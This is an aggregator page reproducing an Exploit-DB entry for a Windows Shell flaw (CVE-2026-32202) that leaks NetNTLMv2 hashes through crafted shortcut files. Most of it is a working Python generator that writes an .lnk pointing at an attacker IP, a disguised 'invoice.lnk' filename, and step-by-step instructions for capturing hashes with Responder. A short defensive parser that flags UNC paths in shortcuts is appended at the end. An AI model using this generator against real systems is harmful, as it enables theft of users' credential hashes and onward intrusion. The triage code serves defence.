Security News

Cybersecurity news aggregator

CRITICAL Vulnerabilities Exploit-DB

[remote] Microsoft - NTLMv2 Hash Capture

A spoofing vulnerability (CVE-2026-32202, CVSS 4.3) in Windows Shell allows an attacker to capture NetNTLMv2 hashes via a crafted .lnk file with a malicious UNC path; the hash is sent automatically when a user opens the folder containing the file, requiring no click. Affected versions include Windows 10 21H2 through 22H2, Windows 11 23H2 through 26H1, and Windows Server 2019, 2022, and 2025. The flaw was patched in Microsoft's April 2026 Patch Tuesday updates, with specific fixed build numbers provided for each affected version.

Microsoft - NTLMv2 Hash Capture

EDB-ID: 52601
CVE: 2026-32202
Author: NU11SECUR1TY
Type: REMOTE
Platform: WINDOWS
Date: 2026-05-29

# Titles: Microsoft - NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202

## Description:
A spoofing vulnerability in Windows Shell (File Explorer) allows an attacker to capture NTLMv2 hashes without user interaction. By crafting a malicious .lnk (shortcut) file with a UNC path pointing to an attacker-controlled SMB server, the target's Windows system automatically sends an NTLMv2 authentication request when the folder containing the .lnk file is opened. No click on the shortcut is required – simply viewing the folder triggers the vulnerability.

**CVSS**: 4.3 (Medium) – NetNTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (user only needs to open a folder)
**User Interaction**: None (zero-click)
**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025

**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)

STATUS: MEDIUM - HIGH/ Vulnerability

[+]Payload:

```POST
SMB/CIFS NTLMv2 Authentication Request
UNC Path: \\ATTACKER_IP\share\payload.dll
Protocol: SMB2 (port 445)
Hash Type: NetNTLMv2
```

[+]Exploit:

```
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates LNK file that leaks NTLM hash to Responder/Impacket
"""

import struct
import sys
import os

def create_malicious_lnk(attacker_ip, output_file="exploit.lnk", share_name="share"):
    """
    Creates LNK file with UNC path to attacker machine
    """
    unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"
    unc_utf16 = unc_path.encode('utf-16le') + b'\x00\x00'

    # LNK structure (standard + vulnerable component)
    lnk = bytearray()

    # ===== HEADER (76 bytes) =====
    lnk.extend(struct.pack('<I', 0x0000004C))  # HeaderSize
    # LinkCLSID: {00021401-0000-0000-C000-000000000046}
    lnk.extend(b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46')
    lnk.extend(struct.pack('<I', 0x000002A3))  # LinkFlags (HasName|HasWorkingDir|HasArguments|IsUnicode)
    lnk.extend(struct.pack('<I', 0x00000080))  # FileAttributes (NORMAL)
    lnk.extend(struct.pack('<Q', 0))           # CreationTime
    lnk.extend(struct.pack('<Q', 0))           # AccessTime
    lnk.extend(struct.pack('<Q', 0))           # WriteTime
    lnk.extend(struct.pack('<I', 0x00001000))  # FileSize
    lnk.extend(struct.pack('<I', 0x00000000))  # IconIndex
    lnk.extend(struct.pack('<I', 0x00000001))  # ShowCommand (SW_NORMAL)
    lnk.extend(struct.pack('<H', 0x0000))      # Hotkey
    lnk.extend(b'\x00\x00')                    # Reserved
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved2
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved3

    # ===== IDLIST (activates when folder is opened) =====
    # Shell Folder IDITEM
    lnk.extend(b'\x14\x00')  # ItemID size (20 bytes)
    lnk.extend(b'\x2e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
    lnk.extend(b'\x00\x00')  # Terminating ID

    # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
    # NameString (UNC path - triggers NTLM hash leak)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)

    # ArgumentsString (empty)
    lnk.extend(b'\x00\x00')

    # WorkingDir (UNC path again)
    lnk.extend(struct.pack('<H', len(unc_utf16)))
    lnk.extend(unc_utf16)

    # ===== Console Properties (required for some Windows versions) =====
    lnk.extend(b'\x50\x00\x14\x00')  # dwWindowSize (80x20)
    lnk.extend(b'\x50\x00\xfa\x00')  # dwBufferSize (80x250)
    lnk.extend(b'\x00\x00\x00\x00')  # dwFontSize
    lnk.extend(b'\x00\x00\x00\x00')  # dwFontFamily
    lnk.extend(b'\x00\x00\x00\x00')  # dwFaceNameLen
    lnk.extend(b'\x00\x00\x00\x00')  # dwFaceNameOffset
    lnk.extend(b'\x00\x00\x00\x00')  # dwStyle

    # 64 bytes padding
    lnk.extend(b'\x00' * 64)

    # Save the file
    with open(output_file, 'wb') as f:
        f.write(lnk)

    return output_file, unc_path

def main():
    print(r"""
╔═══════════════════════════════════════════╗
║     CVE-2026-32202 - LNK Generator        ║
║     Author: nu11secur1ty                  ║
╚═══════════════════════════════════════════╝
    """)

    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP> [output_file]")
        print("Example: python3 cve_2026_32202_gen.py 192.168.1.100 invoice.lnk")
        sys.exit(1)

    attacker_ip = sys.argv[1]
    output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"

    lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)

    print(f"[+] Exploit ready!")
    print(f"[+] File: {lnk_file}")
    print(f"[+] UNC path: {unc_path}")
    print()
    print("[*] Next steps:")
    print(f" 1. Start Responder: sudo responder -I eth0 -v")
    print(f" 2. Transfer {lnk_file} to Windows 11 Desktop")
    print(f" 3. Open Desktop in File Explorer (no click required)")
    print(f" 4. Watch Responder - NTLM hash will appear")
    print()

    with open("start_responder.sh", "w") as f:
        f.write("#!/bin/bash\n")
        f.write("echo \"[+] Starting Responder...\"\n")
        f.write("sudo responder -I eth0 -v\n")
    os.chmod("start_responder.sh", 0o755)
    print("[+] Helper script created: start_responder.sh")

if __name__ == "__main__":
    main()
```

Demo: [href](https://www.patreon.com/posts/cve-2026-32202-159362448)

Code: [code](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202)

Time spent: 02:30:00
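For triage of shortcut files found on shares or in mail attachments, the following added example (not part of the advisory or of Exploit-DB) walks the shell-link layout defined in MS-SHLLINK and reports every StringData field that begins with `\\`. The names `unc_strings` and `sample_lnk` and the host `fileserver.example` are made up for this example; the sample bytes are constructed.

```python
import struct
import sys
from pathlib import Path

# LinkFlags bits and section order follow MS-SHLLINK (ShellLinkHeader, StringData).
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "Name"), (0x08, "RelativePath"), (0x10, "WorkingDir"),
                 (0x20, "Arguments"), (0x40, "IconLocation")]
CLSID = bytes.fromhex("0114020000000000c000000000000046")

def unc_strings(data: bytes):
    """Return [(field, value)] for StringData entries that begin with a UNC prefix."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_IDLIST:        # IDListSize (2 bytes) precedes the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:      # LinkInfoSize includes its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    hits = []
    for bit, field in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # characters, not bytes
        value = data[pos + 2:pos + 2 + count * width].decode(codec, errors="replace")
        pos += 2 + count * width
        if value.startswith("\\\\"):
            hits.append((field, value))
    return hits

def sample_lnk() -> bytes:
    """Constructed sample: bare header plus a WorkingDir on a placeholder host."""
    path = r"\\fileserver.example\share"
    header = struct.pack("<I16sI", 0x4C, CLSID, 0x10 | IS_UNICODE) + bytes(52)
    return header + struct.pack("<H", len(path)) + path.encode("utf-16-le")

if __name__ == "__main__":
    paths = [Path(p) for p in sys.argv[1:]]
    blobs = [(str(p), p.read_bytes()) for p in paths] or [("constructed sample", sample_lnk())]
    for name, blob in blobs:
        try:
            for field, value in unc_strings(blob):
                print(f"{name}: {field} -> {value}")
        except (ValueError, struct.error) as exc:
            print(f"{name}: skipped ({exc})")
```

Only StringData is inspected, so UNC paths stored in LinkInfo or ExtraData blocks are not reported, and shortcuts to legitimate internal shares will appear in the output and need an allow-list.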
